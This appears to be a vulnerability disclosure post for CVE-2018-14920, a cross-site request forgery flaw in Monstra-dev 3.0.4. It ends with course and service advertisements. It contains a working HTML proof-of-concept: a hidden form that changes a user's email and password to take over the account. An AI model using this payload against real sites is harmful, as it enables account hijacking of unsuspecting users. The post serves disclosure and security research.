CVE-2018-14920 : Monstra-Dev Cross Site Request Forgery
CVE-2018-14920 discovered by Nainsi Gupta who is the member of ICSS. It is an achievement for Indian Cyber Security Solutions. The Exploit details are as follows:
Exploit Title: Monstra-Dev Cross Site Request Forgery
Date: 04-08-2018
CVE: CVE-2018-14920
Author: Nainsi Gupta
Vendor Homepage: http://monstra.org/
Product Name: Monstra-dev
Version: 3.0.4
Tested on: Windows 10 (Firefox/Chrome)
Overview:
CSRF vulnerability in admin/user/edit in Monstra-dev 3.0.4 allows an attacker to take over a user account by modifying user’s data such as email and password
Proof Of Concept : CSRF
To exploit this vulnerability, victim need to be logged in at target site namely victim.com and visit crafted site made by attacker namely attacker.com. Then an authenticated POST request will be generated from victim browser and it will be submit to victim.com to modify user’s data to attacker desired value.
<html>
<!– CSRF PoC –>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”http://localhost/monstra-dev/users/2/edit” method=”POST”>
<input type=”hidden” name=”csrf” value=”7e172c2a395495f3e4c05912cb9f3f7f0ed8344e” />
<input type=”hidden” name=”user_id” value=”2″ />
<input type=”hidden” name=”login” value=”guptanainisi95″ />
<input type=”hidden” name=”firstname” value=”sd” />
<input type=”hidden” name=”lastname” value=”jkh” />
<input type=”hidden” name=”email” value=”guptanainsi97@gmail.com” />
<input type=”hidden” name=”twitter” value=”” />
<input type=”hidden” name=”skype” value=”” />
<input type=”hidden” name=”about_me” value=”ss” />
<input type=”hidden” name=”new_password” value=”qaz” />
<input type=”hidden” name=”edit_profile” value=”Save” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Highest Selling Technical Courses of Indian Cyber Security Solutions:
Amazon Web Services Training in Hyderabad
Amazon Web Services Training in Bangalore
Amazon Web Services Training in Bhubaneswar
Summer Training for CSE, IT, BCA & MCA Students
Network Penetration Testing training
Certified Network Penetration Tester
Diploma in Web Application Security
Certified Web Application Penetration Tester
Certified Android Penetration Tester
Cybersecurity services that can protect your company:
Web Security | Web Penetration Testing
Network Penetration Testing – NPT
Android App Penetration Testing
Other Location for Online Courses: